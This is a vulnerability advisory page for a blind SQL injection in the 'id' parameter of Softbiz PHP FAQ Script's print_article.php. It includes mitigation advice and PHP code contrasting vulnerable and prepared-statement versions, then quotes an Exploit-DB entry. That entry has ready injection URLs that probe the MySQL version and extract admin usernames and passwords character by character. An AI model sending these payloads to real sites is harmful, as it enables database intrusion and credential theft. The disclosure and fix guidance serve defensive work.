Vendor: Softbiz PHP FAQ Script
By: Sangteamtham
CVSS: 7.5 (HIGH)
CWE: 89 (Blind SQL Injection)
Product Name: Softbiz PHP FAQ Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Softbiz PHP FAQ Script Blind SQL Vulnerability

Softbiz PHP FAQ Script is vulnerable to blind SQL injection. An attacker can exploit this by sending a crafted HTTP request that carries a malicious SQL fragment to the vulnerable server, and can use it to extract sensitive information from the database such as usernames and passwords. The vulnerable parameter is the 'id' parameter of the 'print_article.php' script. The 'substring' function can be used to read the version of the database installed on the server, and a 'select' statement can then be used to extract data from the database.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries (prepared statements), which bind user input as data so that it can never change the structure of the SQL statement. Additionally, the application should be tested for SQL injection vulnerabilities using automated tools.
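The following is an added illustration of that mitigation, not code from the Softbiz product: the injectable pattern the advisory describes (the 'id' value concatenated into the query) next to a hardened version of the same lookup using a validated integer and a PDO prepared statement. The table and column names (faq_articles, id, title, body) and the connection details are assumptions.

```php
<?php
// Added example (not the Softbiz FAQ code). Table/column names are assumed.

// VULNERABLE: the raw 'id' string is spliced into the SQL text, so any
// condition appended to the value becomes part of the WHERE clause and the
// page's response reveals whether that condition held (blind injection).
function print_article_vulnerable(mysqli $db, string $id): ?array
{
    $sql = "SELECT title, body FROM faq_articles WHERE id = " . $id;
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// HARDENED: enforce the expected type first, then bind the value with a
// prepared statement so it is sent as data and never parsed as SQL.
function print_article_safe(PDO $db, string $id): ?array
{
    // An article id must be a plain positive integer; any other input
    // (including one with SQL appended) is rejected before a query runs.
    $validated = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($validated === false) {
        http_response_code(400);
        return null;
    }

    $stmt = $db->prepare('SELECT title, body FROM faq_articles WHERE id = :id');
    $stmt->bindValue(':id', $validated, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (DSN and credentials are placeholders):
// $pdo = new PDO('mysql:host=localhost;dbname=FAQ_DB', 'DB_USER', 'DB_PASS', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
// ]);
// $article = print_article_safe($pdo, $_GET['id'] ?? '');
```

Disabling emulated prepares makes MySQL itself separate the statement from its bound parameters rather than relying on client-side escaping.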
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$  Softbiz PHP FAQ Script Blind SQL Vulnerability          $
$  Author   : Sangteamtham                                 $
$  Home     : Hcegroup.net & vnbrain.net                   $
$  Download : http://www.softbizscripts.com/FAQ-script-features.php
$                                                          $
$***********************************************************
$
$ check version : http://server.com/fag/print_article.php?id=[id number]+and substring(version(),1,1)=4 
$                        http://server.com/fag/print_article.php?id=[id number]+and substring(version(),1,1)=5
$                        http://server.com/fag/print_article.php?id=[idnumber]+and+(select+substring(concat(1,password_column),1,1)+from+admin_info_table+limit+0,1)=1/*  
$                        http://server.com/fag/print_article.php?id=[idnumber]+and+(select+substring(concat(1,username_column),1,1)+from+admin_info_table+limit+0,1)=1/*
$  note: password_column,username_column,admin_info_table depend on the database installed
$***********************************************************
$ Demo: 
$ In the demo site : 
$ 
$ Exploit:http://server/faq/print_article.php?id=5+and substring(version(),1,1)=5 
$ 
$ MySQL version: 5.0.81-community
$ User: softbiz_kuber@localhost
$ Database: softbiz_faq